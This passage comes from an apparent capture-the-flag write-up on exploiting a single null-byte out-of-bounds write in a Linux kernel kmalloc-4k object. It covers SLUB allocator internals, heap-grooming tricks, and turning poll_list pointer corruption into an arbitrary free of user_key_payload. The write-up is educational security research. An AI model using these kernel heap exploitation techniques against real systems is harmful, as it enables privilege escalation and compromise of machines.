<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="cm">/* SLAB cache for sighand_struct structures (tsk-&gt;sighand) */</span>
<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">sighand_cachep</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">newsighand</span> <span class="o">=</span> <span class="n">kmem_cache_alloc</span><span class="p">(</span><span class="n">sighand_cachep</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Those caches often hold only objects of a specific type or are only used within a certain module.</p>

<p>The second difference has to do with the fact that the kernel is a highly parallel program with complete control over the hardware. While glibc’s malloc has many features to speed up memory allocations in multi-threaded programs by using per-thread data structures, the kernel makes heavy use of <em>per-CPU</em> data structures to improve the performance of the allocator implementation.</p>

<p>For each <em>cache</em> every logical CPU has its own private set of <em>slabs</em> for serving allocations. Among them, the slab that served the last allocation is the so-called <em>CPU slab</em> for that cache, all others are referred to as <em>partial</em> slabs. Note that the allocator does not track full slabs at all. It only becomes aware of them once one of their objects is freed.</p>

<p>What is more, there is the concept of non-uniform memory access (NUMA) machines, where every CPU can access all physical memory, but each CPU has a certain region that is “fast” to access. CPUs with the same “fast” region form so-called NUMA nodes. As another optimization, each <em>node</em> maintains its own set of <em>per-node</em> partial slabs for every cache.</p>

<p>When serving an allocation request, the cache algorithm first checks the CPU slab. This slab has two freelists, a lockless freelist private to the owning CPU and the normal slab freelist, which might require locking. After checking those two, the partial slabs followed by the per-node partial slabs are consulted. On the way the algorithm opportunistically populates the empty lists from the currently checked one. If no existing slab is found, a new one is created and set as the CPU slab.</p>

<p>During a free operation, the slot is added to the freelist (LIFO) of the slab it belongs to. The only exception is freeing an object in a CPU slab on its owning CPU. In that case the slot goes to the lockless freelist. If the slab was previously full, then the CPU opportunistically adds it to its list of partial or per-node partial slabs. There’s one detail concerning a slab’s freelist worth mentioning at this point: for each slab the order in which its slots appear on its initial freelist is randomized during slab creation. Furthermore, freeing the last object in a partial slab might lead to its destruction if the CPU already has a sufficient number of empty slabs.</p>

<p>Here’s my attempt at illustrating the above concepts in a drawing.
<img src="/media/Linux-S1/per_cpu_alloc.jpeg" alt="" /></p>

<p>Those are the core concepts of the SLUB allocator that are needed to understand the exploit and follow the decisions made. Some further aspects will be introduced along the way once we need them.</p>

<p>However, the topic is of course much richer, and I encourage you to have a look at one of the following references to dive deeper: [<a href="https://blogs.oracle.com/linux/post/linux-slub-allocator-internals-and-debugging-1">12</a>], [<a href="https://events.static.linuxfound.org/sites/events/files/slides/slaballocators.pdf">13</a>], [<a href="https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf">14</a>]. After reading one or two of them, what helped me was having a look at the code in <code class="language-plaintext highlighter-rouge">mm/slub.c</code> and walking through allocations and frees in a debugger. It might also be instructive to have a look at gdb extensions that implement SLUB debugging [<a href="https://github.com/nccgroup/libslub">15</a>] [<a href="https://github.com/PaoloMonti42/salt">16</a>] (or writing your own) as well as special purpose debugging tools used by kernel developers [<a href="https://www.kernel.org/doc/Documentation/vm/slub.txt">17</a>]. At this point we will end our digression on SLUB internals and apply our newfound knowledge to solve the challenge at hand.</p>

<h2 id="slub-exploitation-crash-course">SLUB Exploitation Crash Course</h2>

<p>In this section, we will discuss the implementation details described above from an exploitation perspective.</p>

<p>Generally, one can distinguish between exploitation techniques that target the heap implementation and those that target the data stored on the heap. We are going to be focusing on the latter.</p>

<p>First, the per-CPU design implies that we must carefully control on which CPU we trigger allocations and frees. For example, when we trigger an arbitrary free while executing on CPU0, it might very well be impossible to reclaim the freed slot by spraying objects from another CPU. That is since the freed slot might end up on the freelist of a slab that is private to CPU0. Fortunately, the kernel lets a process choose the set of CPUs it would like to run on, and we will make heavy use of this in our exploit [<a href="https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html">18</a>].</p>

<p>Secondly, we would like to minimize unexpected allocations, i.e., changes to the allocator state that we cannot predict. There are several sources of unexpected allocations, only some of which we can control.</p>

<p>The first category are allocations that are directly caused by our exploit process, for instance, due to system calls or exceptions that we trigger. This is one reason we are using a low-level systems language, C in this case, for writing our exploit program. Doing this gives us a high degree of control over the allocations the kernel performs in the context of our process. One might ask why we do not use a high-level language like Python or JavaScript for writing the exploit, and one reason is that here the language runtime would introduce too much noise in the form of unexpected allocations. To further minimize changes to the CPU’s allocator state, we can perform actions that inevitably cause unwanted allocations, like spawning threads or new processes, on another CPU.</p>

<p>The second category are allocations caused by other processes that we are sharing the CPU with. For example, suppose that we start our exploit by allocating a <em>vulnerable</em> object (Note: that being the lingo for an object that “contains” a vulnerability such as an out-of-bounds memory write). Then, our process gets <em>scheduled out</em>, i.e., another process gets to run on the CPU, before we can allocate the <em>victim object</em> (Note: that being the lingo for an object that we would like to “attack” with the vulnerable object, e.g., by overwriting some pointer inside it). The other process might then cause lots of allocations that fill up the slab containing the vulnerable object, shattering our dreams of causing a successful memory corruption once we get the CPU back.</p>

<p>To mitigate this risk, we can exploit the fact that the kernel tries to spread load evenly across CPUs and that we can split tasks between independent streams of execution [<a href="https://lwn.net/Articles/793427/">19</a>]. For example, by spraying the victim object from many threads pinned to the same CPU (recall that threads are scheduled independently of each other), we can increase the chance of a successful exploit: in case our main thread gets scheduled out, another one of our threads might get the CPU and successfully allocate the victim object. Furthermore, we can fill the CPU’s run queue (that being the list of processes that the scheduler can choose from on a context switch) with processes that yield the CPU in a loop. Yielding means that the task requests to be moved to the back of the run queue. The goal of this exercise is to force the load balancer to migrate unrelated tasks to other CPUs while maximizing the CPU time of our exploit process.</p>

<p>Yet another technique to mitigate the risk of losing the CPU at an inconvenient moment is to measure the time our process spends on and off the CPU before we begin a critical section, i.e., a code segment during which we do not want to have the CPU taken away from us. By performing those measurements, we can begin the critical section directly after we got the CPU back from some other process. The underlying assumption here is that the likelihood of losing the CPU during the next infinitesimal time interval increases monotonically with the time that we have already had it. Different scheduling classes, scheduling priorities, scheduling parameters, interrupts, preemption, system load, etc. make the exact functional dependence non-trivial and certainly non-constant, but to me the general assumption still seems justified. However, it would surely be worthwhile to perform some measurements to evaluate those techniques.</p>

<p>The third category are frees of objects in one of our CPU’s partially filled slabs that happen on a foreign CPU. This can be mitigated by filling all partial slabs prior to exploitation (see below). Foreign CPUs will then free objects in full slabs, which results in the now-partial slab being moved to their partial lists.</p>

<p>The last category are allocations that are happening during interrupts. To the best of my knowledge, there is not much we can do about them.</p>

<p>In the previous section, we already mentioned that the allocation size is not the only parameter that influences which cache serves an allocation request. For example, depending on the kernel version and configuration, reclaiming the slot of an object that was allocated by a call to kmalloc with <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> by spraying objects that have the same size but are allocated with <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/gfp.h#L299"><code class="language-plaintext highlighter-rouge">GFP_KERNEL</code></a> is a hopeless ordeal, since the objects are allocated in different caches. In general, this problem can be overcome by draining the slab, which, as you may recall, causes it to be destroyed and handed back to the page allocator, and then re-using the very same memory for a slab in another cache. (Note: The page allocator, also known as the buddy allocator, is used by the kernel to allocate one or more pages of contiguous memory.) In other cases it might be viable to “spray slabs” to create a memory layout where slabs belonging to different caches are adjacent. This can then be used to perform cross-cache overflows or to exploit partial pointer overwrites.</p>

<p>Finally, there is the problem posed by an unknown allocator state, i.e., the number, fill status and object composition of existing per-CPU and per-node slabs when we start our exploit. We can normalize the heap state by performing a large number of allocations, followed by freeing a slab’s worth of them, to force a state where there is an empty CPU slab and a single partial slab. In the literature this technique is often called defragmentation, and I tried to illustrate its effect in the following drawing.
<img src="/media/Linux-S1/defragment.jpg" alt="" /></p>

<p>However, being able to create an allocator state with an empty CPU slab does not imply that it is trivial to control the relative positioning of vulnerable and victim object allocations. One reason why this is still hard is the randomization of the order in which the slots of a slab are handed out by the allocator. To successfully exploit an out-of-bounds write, for example, one can try to allocate the vulnerable object in a slab that’s otherwise filled with victim objects. If the vulnerable object offers an out-of-bounds read, or other information leak primitives, they might as well be used to defeat the randomization.</p>

<p>Of course, I cannot (and probably should not attempt to) give a comprehensive overview of heap exploitation and exploit stabilization techniques at this point. I tried to focus on the things that will become relevant in the exploit we discuss below, but there is a lot more one could say about the topic. For example, you could read about cross-cache attacks [<a href="https://etenal.me/archives/1825">20</a>] [<a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">21</a>], attacking the implementation [<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">22</a>] or completely re-purposing the slab’s pages [<a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">23</a>]. This recent paper by Kyle et al. might also be a good starting point [<a href="https://github.com/sefcom/KHeaps">24</a>].</p>

<h2 id="constructing-an-arbitrary-free-primitive">Constructing an Arbitrary Free Primitive</h2>

<p>Recall that the bug is essentially giving us the following primitive</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">filter</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="n">GFP_KERNEL_ACCOUNT</span><span class="p">);</span>
<span class="p">...</span>
<span class="n">filter</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>
<p>In other words, we can write a single null byte out of bounds in a kmalloc-4k slab.</p>

<p>What can we do with that primitive? Of course, we can look up possible answers as there are public exploits for this challenge, but let’s nevertheless go through some ideas.</p>

<p>Brandon Azad of Google Project Zero defines an <em>exploit strategy</em> as <em>“The low-level, vulnerability-specific method used to turn the vulnerability into a useful exploit primitive.”</em> [<a href="https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html">25</a>]. Our bug already gives us a useful, albeit rather weak, primitive. Thus, what we need is an <em>exploit technique</em>, i.e., <em>“A reusable and reasonably generic strategy for turning one exploit primitive into another (usually more useful) exploit primitive.”</em>. We can gather ideas for possible exploit techniques by looking at public exploits that had similar primitives. A good starting point would be Google’s <em>Kernel Exploits Recipes Notebook</em> [<a href="https://docs.google.com/document/d/1a9uUAISBzw3ur1aLQqKc5JOQLaJYiOP5pe_B4xCT1KA/edit#heading=h.nqnduhrd5gpk">26</a>], but there is probably no way around reading lots of blog posts.</p>

<p>One idea would be to corrupt the <em>reference count</em> of an adjacent victim object. Many kernel objects have a field that keeps track of the number of entities that are using the object. When an entity releases its reference, the kernel checks whether it was the last one holding on to the object, and in that case the object is destroyed. Thus, by using our corruption primitive to decrement a refcount we might be able to cause a use-after-free on some victim object.</p>

<p>Another idea would be to corrupt the <em>flags</em> of an object, causing it to be handled in an unexpected manner. Yet another common approach would be to corrupt a <em>length</em> field in some victim structure to subsequently exploit flawed bounds checks on the corresponding buffer. However, the latter idea suffers from the fact that our primitive can only ever decrease a value, which may not be what we want to do with a length.</p>

<p>While all those ideas might very well work, we will go with another typical target of partial overwrites: pointers. Roughly speaking, there are three kinds of pointers that might be present in a victim structure: function pointers, data pointers, or linked list pointers. But how do we find objects that have an interesting pointer as their first member?</p>

<p>Since we compiled the kernel with debugging information we can use the <code class="language-plaintext highlighter-rouge">pahole</code> tool to list kernel structs. (The <code class="language-plaintext highlighter-rouge">-E</code> flag expands embedded structs and typedefs, whereas the other two commands generate lists of object sizes and variable-size objects, respectively.)</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>pahole <span class="nt">--structs</span> <span class="nt">-E</span> vmlinux <span class="o">&gt;</span> /tmp/pahole_vmlinux_E
<span class="nv">$ </span>pahole <span class="nt">-s</span> vmlinux <span class="o">&gt;</span> /tmp/pahole_vmlinux_s
<span class="nv">$ </span>pahole <span class="nt">--with_flexible_array</span> vmlinux <span class="o">&gt;</span> /tmp/pahole_vmlinux_flex
</code></pre></div></div>
<p>From now on, the kinds of queries we can make against the set of kernel objects are limited only by our command of core UNIX utilities and their chaining. For example, we can generate a list of the five biggest structs that start with a function pointer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sm_metadata 25200
sm_disk 8752
e1000_mac_info 768
poll_wqueues 560
net_device_ops 560
</code></pre></div></div>
<p>However, upon closer inspection, none of those objects looks like it can be allocated in kmalloc-4k. Generating the list of all structs that start with a function pointer and have a flexible array member yields the following set</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ahash_request_priv
ff_device
pci_packet
pm_clk_notifier_block
Qdisc
</code></pre></div></div>
<p>Again, none of those structures looks like we can control its allocation in kmalloc-4k, and even if we could, it is questionable whether the partial overwrite of the function pointer would be of any use.</p>

<p>Using a memory corruption primitive for attacking linked lists has an awfully long history in exploitation. For example, TheFlow used a two-null-byte OOB write to corrupt the list linking messages in a POSIX message queue [<a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html">27</a>]. While we cannot use this technique due to our container’s seccomp filter, we will go with the general idea.</p>

<p>One idea to exploit the fact that some object is now unknowingly part of the list is to trigger a cleanup of the list, thereby arbitrarily freeing the object. In pictures, this means turning
<img src="/media/Linux-S1/ssl_idea.jpg" alt="" />
into
<img src="/media/Linux-S1/arb_free_idea.jpg" alt="" /></p>

<p>We can try to identify structs that are potentially chained in such a way by generating a list of all structs that start with a member of type “pointer-to-own-struct-type”. Again, there is no object with a size that could end up in kmalloc-4k, but filtering for flexible array members yields a somewhat short list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bio
hpets
mmu_gather_batch
neighbour
nh_group
pneigh_entry
poll_list
poll_table_page
sched_domain
sched_group
</code></pre></div></div>
<p>(Note: You might wonder why the above-mentioned messages do not appear in this list. This is because they are linked using the kernel’s list management API, the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/types.h#L178"><code class="language-plaintext highlighter-rouge">struct list_head</code></a> to be concrete. Including those is left as an exercise for the reader.)</p>

<p>Identifying some struct that looks like it might be a suitable victim object is good, however, we still need to verify that we are able to reliably allocate it next to the vulnerable object. Furthermore, the way in which the object is used after the corruption must provide us with a useful exploitation primitive without endangering system stability.</p>

<p>It would be interesting to develop a more sophisticated solution that allows for more complex queries against the set of kernel structures. Combining it with compile-time static analysis for finding allocation sites and run-time tracing to identify reaching code paths could improve the seemingly very manual process of victim object discovery.</p>

<p>The above list already includes our victim-of-choice, the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L839"><code class="language-plaintext highlighter-rouge">poll_list</code></a>. It was discovered by the challenge author, and it seems likely the challenge was designed with that object in mind.</p>

<p>By reading its man page we can learn that the poll system call allows a process to pass the kernel a table whose rows consist of a file descriptor and a set of events to monitor on it [<a href="https://man7.org/linux/man-pages/man2/poll.2.html">28</a>]. When one of those events occurs, the system call will return, and the third column will indicate which events occurred. Imagine, for example, a single-threaded asynchronous server that has many open connections to clients, each represented by a file descriptor. The server may then serve all those clients by using poll to get notified when new data arrives on any of those connections. The remaining parameter of the poll system call is the timeout in milliseconds after which it will unconditionally return.</p>

<p>Internally, the kernel saves the table in a singly linked list of <code class="language-plaintext highlighter-rouge">poll_list</code> objects. The first few rows are saved on the kernel stack as a performance optimization {1}, while the rest is split into chunks of 510 rows {2}, which are allocated in kmalloc-4k {3}. The last, potentially smaller, chunk might end up in another cache, kmalloc-32 in our case.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">do_sys_poll</span><span class="p">(</span><span class="k">struct</span> <span class="n">pollfd</span> <span class="n">__user</span> <span class="o">*</span><span class="n">ufds</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">nfds</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">timespec64</span> <span class="o">*</span><span class="n">end_time</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">poll_wqueues</span> <span class="n">table</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">,</span> <span class="n">fdcount</span><span class="p">,</span> <span class="n">len</span><span class="p">;</span>
	<span class="cm">/* Allocate small arguments on the stack to save memory and be
	   faster - use long to make sure the buffer is aligned properly
	   on 64 bit archs to avoid unaligned access */</span>
	<span class="kt">long</span> <span class="n">stack_pps</span><span class="p">[</span><span class="n">POLL_STACK_ALLOC</span><span class="o">/</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">)];</span> <span class="c1">// {1}</span>
	<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="k">const</span> <span class="n">head</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="p">)</span><span class="n">stack_pps</span><span class="p">;</span>
 	<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="n">walk</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>
 	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">todo</span> <span class="o">=</span> <span class="n">nfds</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">nfds</span> <span class="o">&gt;</span> <span class="n">rlimit</span><span class="p">(</span><span class="n">RLIMIT_NOFILE</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">len</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">,</span> <span class="n">nfds</span><span class="p">,</span> <span class="n">N_STACK_PPS</span><span class="p">);</span>
	<span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>
		<span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
		<span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">len</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">walk</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">,</span> <span class="n">ufds</span> <span class="o">+</span> <span class="n">nfds</span><span class="o">-</span><span class="n">todo</span><span class="p">,</span>
					<span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">pollfd</span><span class="p">)</span> <span class="o">*</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">))</span>
			<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>

		<span class="n">todo</span> <span class="o">-=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">todo</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">todo</span><span class="p">,</span> <span class="n">POLLFD_PER_PAGE</span><span class="p">);</span> <span class="c1">// {2}</span>
		<span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="n">struct_size</span><span class="p">(</span><span class="n">walk</span><span class="p">,</span> <span class="n">entries</span><span class="p">,</span> <span class="n">len</span><span class="p">),</span>
					    <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="c1">// {3}</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">walk</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="n">poll_initwait</span><span class="p">(</span><span class="o">&amp;</span><span class="n">table</span><span class="p">);</span>
	<span class="n">fdcount</span> <span class="o">=</span> <span class="n">do_poll</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">table</span><span class="p">,</span> <span class="n">end_time</span><span class="p">);</span> <span class="c1">// {4}</span>
	<span class="n">poll_freewait</span><span class="p">(</span><span class="o">&amp;</span><span class="n">table</span><span class="p">);</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">user_write_access_begin</span><span class="p">(</span><span class="n">ufds</span><span class="p">,</span> <span class="n">nfds</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">ufds</span><span class="p">)))</span>
		<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>

	<span class="k">for</span> <span class="p">(</span><span class="n">walk</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span> <span class="n">walk</span><span class="p">;</span> <span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// {5}</span>
		<span class="k">struct</span> <span class="n">pollfd</span> <span class="o">*</span><span class="n">fds</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">;</span>
		<span class="kt">int</span> <span class="n">j</span><span class="p">;</span>

		<span class="k">for</span> <span class="p">(</span><span class="n">j</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span> <span class="n">j</span><span class="p">;</span> <span class="n">fds</span><span class="o">++</span><span class="p">,</span> <span class="n">ufds</span><span class="o">++</span><span class="p">,</span> <span class="n">j</span><span class="o">--</span><span class="p">)</span>
			<span class="n">unsafe_put_user</span><span class="p">(</span><span class="n">fds</span><span class="o">-&gt;</span><span class="n">revents</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ufds</span><span class="o">-&gt;</span><span class="n">revents</span><span class="p">,</span> <span class="n">Efault</span><span class="p">);</span>
  	<span class="p">}</span>
	<span class="n">user_write_access_end</span><span class="p">();</span>

	<span class="n">err</span> <span class="o">=</span> <span class="n">fdcount</span><span class="p">;</span>
<span class="nl">out_fds:</span>
	<span class="n">walk</span> <span class="o">=</span> <span class="n">head</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">walk</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// {6}</span>
		<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="n">pos</span> <span class="o">=</span> <span class="n">walk</span><span class="p">;</span>
		<span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>
		<span class="n">kfree</span><span class="p">(</span><span class="n">pos</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>

<span class="nl">Efault:</span>
	<span class="n">user_write_access_end</span><span class="p">();</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
	<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>
<p>Afterwards, the kernel will periodically check on all the file descriptors in the call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L884"><code class="language-plaintext highlighter-rouge">do_poll</code></a> {4}. When a requested event occurs, or the timeout fires, the call returns, and the kernel will walk through the list and copy the occurred events back to user space {5}, freeing the list of <code class="language-plaintext highlighter-rouge">poll_list</code> objects afterwards {6}.</p>

<p>The number of objects in a kmalloc-4k slab on our target system is eight. Consequently, the ideal memory layout for exploiting our off-by-null bug would be to have seven victim <code class="language-plaintext highlighter-rouge">poll_list</code> objects and one vulnerable syscall filter object in the same slab.</p>

<p>Then, there is a 7/8 probability of writing to the <code class="language-plaintext highlighter-rouge">next</code> pointer of a <code class="language-plaintext highlighter-rouge">poll_list</code>; in the remaining case we write to unused memory after the slab, which, with some luck, does not cause a kernel crash.</p>

<p>There’s another 7/8 chance that we actually corrupt the next pointer, with the other cases being ones where it already ends in a null byte. Those are also retryable.</p>

<p>If we manage to trigger a corruption, we would like to maximize the probability that the corrupted pointer now points to a victim object. Consequently, we would like 121 of the 128 objects in the kmalloc-32 slab to be victim objects, with the other seven objects being the next <code class="language-plaintext highlighter-rouge">poll_list</code> objects. Therefore, assuming that the pointer was corrupted, there is a 121/127 chance that it now points to a victim object, with the other cases being the ones where it points to another <code class="language-plaintext highlighter-rouge">poll_list</code>. While the double-free that occurs in the latter case is very likely to lead to a kernel crash down the road, an overall best-case 121/127 probability of a successful arbitrary free is not too bad. (Best-case as there are rare occasions where other effects interfere with our allocations, cf. the above discussion.)</p>

<p>The following drawing illustrates the desired memory layout.
<img src="/media/Linux-S1/mem_pl_corr.jpg" alt="" />
By corrupting the next pointer of the second-to-last node in a singly linked list of <code class="language-plaintext highlighter-rouge">poll_list</code> objects we include an unsuspecting victim object in the list. Returning from the system call triggers the list cleanup and arbitrarily frees the victim object.</p>

<h2 id="exploiting-the-arbitrary-free">Exploiting the Arbitrary Free</h2>

<p>In theory, we now know how to turn our OOB write into an arbitrary free primitive. However, we still need to implement and execute it. Furthermore, there remains the open question of: what is it that we want to free?</p>

<p>Since our partial overwrite can only divert the next pointer to an object in the same slab as the original one, the victim must live in kmalloc-32 as well. Luckily for us, there exists previous research on victim objects, which also considered where they can be allocated [<a href="https://zplin.me/papers/ELOISE.pdf">29</a>], [<a href="https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload">30</a>]. They already identified <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/keys/user-type.h#L27"><code class="language-plaintext highlighter-rouge">user_key_payload</code></a> as an object with some pleasant properties. For some background on the in-kernel key management and retention facility, see [<a href="https://man7.org/linux/man-pages/man7/keyrings.7.html">31</a>].</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct user_key_payload {
	struct callback_head {
		struct callback_head * next;                                             /*     0     8 */
		void               (*func)(struct callback_head *);                      /*     8     8 */
	}rcu; /*     0    16 */
	short unsigned int         datalen;                                              /*    16     2 */

	/* XXX 6 bytes hole, try to pack */

	char                       data[];                                               /*    24     0 */

	/* size: 24, cachelines: 1, members: 3 */
	/* sum members: 18, holes: 1, sum holes: 6 */
	/* last cacheline: 24 bytes */
};
</code></pre></div></div>
<p>The struct is a simple container for user-supplied <code class="language-plaintext highlighter-rouge">data</code>, where the length of the data is stored alongside it in the <code class="language-plaintext highlighter-rouge">datalen</code> field. Crucially, the kernel will consult this length field when copying the data back to user space [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L171">32</a>]. Thus, by aiming our arbitrary free at this object we can easily create an information leak from the resulting use-after-free. At this point, the attentive reader might spot a potential problem. Recall how the kernel cleans up the <code class="language-plaintext highlighter-rouge">poll_list</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">while</span> <span class="p">(</span><span class="n">walk</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="n">pos</span> <span class="o">=</span> <span class="n">walk</span><span class="p">;</span>
	<span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>
	<span class="n">kfree</span><span class="p">(</span><span class="n">pos</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>i.e., we potentially jeopardize system stability if the first QWORD of the victim object is not under our control. This is where the second useful property of <code class="language-plaintext highlighter-rouge">user_key_payload</code> becomes important: its first two QWORDs are not initialized on allocation. However, this only leads us to the next problem: how to initialize them?</p>

<p>Back in 2018 Vitaly Nikolenko invented the “universal heap spray” that, in essence, allowed the allocation of an arbitrary amount of data in arbitrary caches [<a href="https://duasynt.com/blog/linux-kernel-heap-spray">33</a>]. One part of the technique involved the observation that the <code class="language-plaintext highlighter-rouge">setxattr</code> system call essentially makes an allocation with a user-controlled size and then fills it with user-controlled data [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/xattr.c#L511">34</a>] [<a href="https://man7.org/linux/man-pages/man7/xattr.7.html">35</a>]. The problem with heap spraying, however, is that the buffer is freed when the syscall returns. In our case that is not a problem at all as it provides a reliable way to initialize heap memory. In particular, by reclaiming the chunk used during the setxattr operation when allocating the key, we ensure that confusing our key for a <code class="language-plaintext highlighter-rouge">poll_list</code> does not cause unpredictable behavior during list cleanup. To speed up this preparatory step, we can make the <code class="language-plaintext highlighter-rouge">copy_from_user</code> operation fail at the last byte, e.g., by letting it run into unmapped memory, to skip the rest of the syscall.</p>

<p>To create the memory layout sketched above, we begin by normalizing the kmalloc-4k and kmalloc-32 caches as described in the section on SLUB exploitation [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L350C2-L362C18">36</a>]. Then, we start seven threads to allocate the <code class="language-plaintext highlighter-rouge">poll_list</code> objects, and another thread to allocate <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L365C1-L383C1">37</a>]. While using threads for polling is necessary due to the blocking nature of the system call, using threads for the keys is optional, but might reduce the chance of unexpected allocations due to the scheduling of an unrelated task. The main thread triggers the memory corruption once all <code class="language-plaintext highlighter-rouge">poll_list</code> objects are allocated [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L294">38</a>].</p>

